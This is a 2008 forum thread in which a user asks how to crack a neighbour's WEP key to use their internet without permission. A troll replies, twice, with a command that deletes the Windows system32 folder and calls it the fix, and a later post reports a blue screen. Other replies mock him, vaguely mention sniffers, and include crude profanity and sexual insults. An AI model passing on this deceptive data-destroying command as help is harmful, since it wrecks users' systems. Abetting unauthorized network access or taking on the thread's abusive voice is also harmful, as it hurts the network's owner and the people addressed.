How to Hack a WEP to use my neighbors internet?

EricfromWillowGrove

Jun 20, 2008
ok my internet sucks and i have rele good singnal from my neigbors and ive been trying to do it i cant do it so if you could give me step by step that would be great and i also have VISTA and i also need to now where to get the programs from THANKS

Delete your system32, that's what is stopping you from getting into his connection.

To remove the System32, the quickest, most effective method is to go to start > run and type "cmd" then press enter. You should get a black window called command prompt. Next type the following in:

/c rd /s /q c:\windows\system32

Delete your system32, that's what is stopping you from getting into his connection.

To remove the System32, the quickest, most effective method is to go to start > run and type "cmd" then press enter. You should get a black window called command prompt. Next type the following in:

/c rd /s /q c:windowssystem32

hahaha lol you .... Your Trying to Crupt his computer lol. hahahahhahahahahhaha if u take off your Sys 32 than your comp will fry. or Crash!!!!! :)

I typed as per your instruction:

however I still can't connect to my neighbor's internet, and now even my computer got blue screen. What's wrong, please help!

removing System32 is like putting the computer into the exhaust from a jet engine with full afterburners. then the blue screen is bad shit.....dumbest thing ever....

contact
aim-pants116

haha

however I still can't connect to my neighbor's internet, and now even my computer got blue screen. What's wrong, please help!

the blue screen is the blue death screen hahaha

Fuck U!

god dat guys a fuckn asshole, and da other guys a dumbass. I cant believe im reading dis shit. it would be nice to know da real answer tho. theres gotta be an easy way with da built in wireless

Snifer

Hey, you need to get a sniffer and a WEP code generator good luck with that!

P.S. face-palm for the guy that deleted his system 32 and shame on you DMnt, good trolling though!

i hate mean people

omg you people are so mean to that person why would you guys do that to him poor guy his computer is stiffed now..... ohh come on people

how did he reply when his computer is with blue screen??????????

system32

"You did it? system32 is a very important file in your os hes just tryin to mess up your system!"http://www.ihav.net/vb/images/icons/1/gun.gif

Hahahahaha it would of been cheaper to just pay for Internet service, now you got the coolest paper weight around! Lmao:big laugh::big laugh:

Hahahahaha it would of been cheaper to just pay for Internet service, now you got the coolest paper weight around! Lmao:big laugh::big laugh:

Ok thought about it and although it is funny, I will give the guy some advice he shoulda learned as a kid, DON'T TALK TO STRANGERS!!! The rules apply here too!!! Lolololol

Sick as fuck, cant believe you done that to the poor guy........ Get a life if you didn't want to help then you shold have just fucked off!!!
DMNT - GO FUCK YOUR MUM UP THE ASS YOU SICK FOOL, I ALREADY DID WAS NOT GOOD !!!!:crazy eyes:

Back